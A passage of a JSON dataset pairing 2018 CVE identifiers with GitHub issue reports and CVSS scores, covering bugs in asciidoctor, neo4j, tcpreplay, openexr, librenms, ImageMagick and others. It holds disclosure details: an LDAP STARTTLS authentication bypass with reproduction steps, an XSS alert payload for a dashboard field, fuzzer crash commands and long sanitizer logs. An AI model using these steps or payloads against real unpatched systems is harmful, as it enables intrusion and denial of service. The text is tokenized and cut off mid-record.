        "Repo_new": "asciidoctor/asciidoctor",
        "Issue_Created_At": "2018-09-26T08:51:58Z",
        "description": "Infinite loop in Parser next_block. This is another bug found with the fuzzer. With specific input it's possible to cause an inifinite loop in the APITAG method when parsing an asciidoctor file, due to a never breaking while true statement. I think this bug should be prioritized since it can cause a denial of service in programs that rely on asciidoctor. Specifically APITAG is safe since it uses aggressive timeouts in its markup process, although I did later get a NUMBERTAG error on the APITAG main page for a few hours that I've never seen before. I can't tell if it's related or not. Example input APITAG And also APITAG Explanation In the APITAG method there is a while true statement that is used for flow control, and meant to execute only once according to its documentation. I provide no PR since I am not sure what is missing from the loop logic. Plus, I personally think it would be good practice to rewrite this and eliminate the use of an infinite loop especially since it is only used for flow control.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18389",
        "Issue_Url_old": "https://github.com/neo4j/neo4j/issues/12047",
        "Issue_Url_new": "https://github.com/neo4j/neo4j/issues/12047",
        "Repo_new": "neo4j/neo4j",
        "Issue_Created_At": "2018-10-05T15:19:31Z",
        "description": "Using STARTTLS breaks LDAP authentication. Abstract I discovered that when I configure the LDAP Auth Provider to use STARTTLS authentication is broken, i.e. I can log into the Neo4j instance with any existing user account using arbitrary passwords. Unencrypted LDAP connections (without STARTTLS) and LDAPS connections are not affected. Neo4j version NUMBERTAG enterprise (also reproduced with NUMBERTAG enterprise) Operating system: Alpine (via Docker) APITAG ? Steps to reproduce NUMBERTAG Create APITAG : yaml version NUMBERTAG services: openldap: image: osixia/openldap NUMBERTAG ports NUMBERTAG environment: LDAP_BASE_DN= LDAP_READONLY_USER=true APITAG APITAG LDAP_TLS_VERIFY_CLIENT=try APITAG APITAG APITAG volumes: PATHTAG PATHTAG command: copy service neo4j: image: neo4j NUMBERTAG enterprise ports NUMBERTAG environment: APITAG volumes: PATHTAG PATHTAG PATHTAG NUMBERTAG Pull Docker images: APITAG NUMBERTAG Create APITAG : ERRORTAG NUMBERTAG Create certificates and truststore CODETAG NUMBERTAG Create APITAG : CODETAG NUMBERTAG Create logs directory: mkdir logs NUMBERTAG APITAG NUMBERTAG erify STARTTLS works and account alice exists: APITAG Corresponding LDAP log: ERRORTAG NUMBERTAG Open Neo4J in your browser at APITAG and login using the account alice and the password bob Expected behavior Login fails with error message ERRORTAG Actual behavior Login succeeds.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18407",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/488",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/488",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2018-10-15T15:58:43Z",
        "description": "Heap overflow in APITAG A heap based buffer overflow was discovered in tcpreplay edit binary, during the incremental checksum operation. The issue is being triggered in the function APITAG at APITAG , invoked by APITAG in APITAG . Tested version NUMBERTAG Command: tcpreplay edit portmap NUMBERTAG seed NUMBERTAG APITAG intf1=eno1 intf2=eno3 decode=some preload pcap verbose $POC Debugging: ERRORTAG ERRORTAG ASAN Report ERRORTAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-18408",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/489",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/489",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2018-10-15T16:32:35Z",
        "description": "Use after free in APITAG . A heap use after free issue exists in tcpbridge binary of tcpreplay, being triggered in function APITAG at file APITAG . Tested version NUMBERTAG Command: tcpbridge intf1=en7 Debugging ERRORTAG APITAG ASAN Report ERRORTAG No reproducer file required.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18422",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/8",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/8",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2018-10-16T06:54:47Z",
        "description": "APITAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18434",
        "Issue_Url_old": "https://github.com/linlinjava/litemall/issues/76",
        "Issue_Url_new": "https://github.com/linlinjava/litemall/issues/76",
        "Repo_new": "linlinjava/litemall",
        "Issue_Created_At": "2018-10-12T07:37:33Z",
        "description": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e. \u60a8\u597d: APITAG APITAG FILETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18443",
        "Issue_Url_old": "https://github.com/openexr/openexr/issues/350",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/350",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2018-10-17T12:48:54Z",
        "description": "heap buffer overflow. Hello APITAG team, I have identified an issue affecting APITAG by using AFL fuzz. root APITAG valgrind v tool=memcheck leak check=full exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB like this NUMBERTAG PATHTAG exrmultiview NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ab NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG c5c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG fee0 APITAG redirected to NUMBERTAG bab0 (bcmp NUMBERTAG REDIR NUMBERTAG f0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG d2a0 APITAG redirected to NUMBERTAG calloc NUMBERTAG REDIR NUMBERTAG e NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG af NUMBERTAG APITAG new(unsigned long)) redirected to NUMBERTAG dc0 (operator new(unsigned long NUMBERTAG REDIR NUMBERTAG APITAG delete(void )) redirected to NUMBERTAG e NUMBERTAG operator delete(void NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG strncpy NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG d NUMBERTAG strstr_sse NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG new ](unsigned long)) redirected to NUMBERTAG e0 (operator APITAG long NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG strncmp_sse NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG REDIR NUMBERTAG df NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG posix_memalign NUMBERTAG REDIR NUMBERTAG APITAG delete[ void ) redirected to NUMBERTAG operator delete FILETAG Version openexr NUMBERTAG Found by:TAN JIE",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18444",
        "Issue_Url_old": "https://github.com/openexr/openexr/issues/351",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/351",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2018-10-17T12:59:22Z",
        "description": "Out of Memory . Hello APITAG team, I have identified an issue affecting APITAG by using AFL fuzz. root APITAG exrmultiview left PATHTAG right APITAG NUMBERTAG exr exrmultiview: APITAG _int_malloc: Assertion `(unsigned long) (size) >= (unsigned long) (nb)' failed. Aborted root APITAG valgrind v tool=memcheck leak check=full exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB like this NUMBERTAG PATHTAG exrmultiview NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ab NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG c5c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG fee0 APITAG redirected to NUMBERTAG bab0 (bcmp NUMBERTAG REDIR NUMBERTAG f0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG d2a0 APITAG redirected to NUMBERTAG calloc NUMBERTAG REDIR NUMBERTAG e NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG af NUMBERTAG APITAG new(unsigned long)) redirected to NUMBERTAG dc0 (operator new(unsigned long NUMBERTAG REDIR NUMBERTAG APITAG delete(void )) redirected to NUMBERTAG e NUMBERTAG operator delete(void NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG strncpy NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG d NUMBERTAG strstr_sse NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG new ](unsigned long)) redirected to NUMBERTAG e0 (operator APITAG long NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG strncmp_sse NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG REDIR NUMBERTAG df NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG posix_memalign NUMBERTAG REDIR NUMBERTAG APITAG delete[ void ) redirected to NUMBERTAG operator delete FILETAG Version openexr NUMBERTAG Found by:TAN JIE",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18478",
        "Issue_Url_old": "https://github.com/librenms/librenms/issues/9170",
        "Issue_Url_new": "https://github.com/librenms/librenms/issues/9170",
        "Repo_new": "librenms/librenms",
        "Issue_Created_At": "2018-09-07T23:45:41Z",
        "description": "[SECURITY] Persistent Cross Site Scripting (XSS). Hi, dashboard_name parameter is vulnerable to Persistent Cross Site Scripting attacks through POST requests in FILETAG resource. This vulnerability, allow remote attackers to inject arbitrary web script or HTML. Proof of concept APITAG Click in New Dashboard (+) and enter payload \" APITAG alert('XSS APITAG APITAG \" in name field Greetings!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18482",
        "Issue_Url_old": "https://github.com/lfittl/libpg_query/issues/49",
        "Issue_Url_new": "https://github.com/pganalyze/libpg_query/issues/49",
        "Repo_new": "pganalyze/libpg_query",
        "Issue_Created_At": "2018-09-28T06:46:14Z",
        "description": "Memory leak in APITAG Hi, I compiled the 'parse_plpgsql.c' and tested it with file APITAG APITAG and valgrind find memory leak in APITAG ERRORTAG ERRORTAG After debugging by gdb, I found it seems APITAG doesn't free correctly when parse APITAG function APITAG doesn't be called.)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18531",
        "Issue_Url_old": "https://github.com/penggle/kaptcha/issues/3",
        "Issue_Url_new": "https://github.com/penggle/kaptcha/issues/3",
        "Repo_new": "penggle/kaptcha",
        "Issue_Created_At": "2018-10-18T02:18:47Z",
        "description": "Insecure Random. URLTAG I think it should be use a secure random algorithm APITAG An attacker will simply compute the seed from the output values observed. This takes significantly less time than NUMBERTAG in the case of APITAG It is shown that you can predict future Random outputs observing only two(!) output values in time roughly NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18544",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1360",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1360",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-10-19T16:20:51Z",
        "description": "Memory Leak in function APITAG of msl.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There a memroy leak in function APITAG of msl.c Steps to Reproduce APITAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG e3 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG b5 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG a2 in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG bc in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG ae5 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d 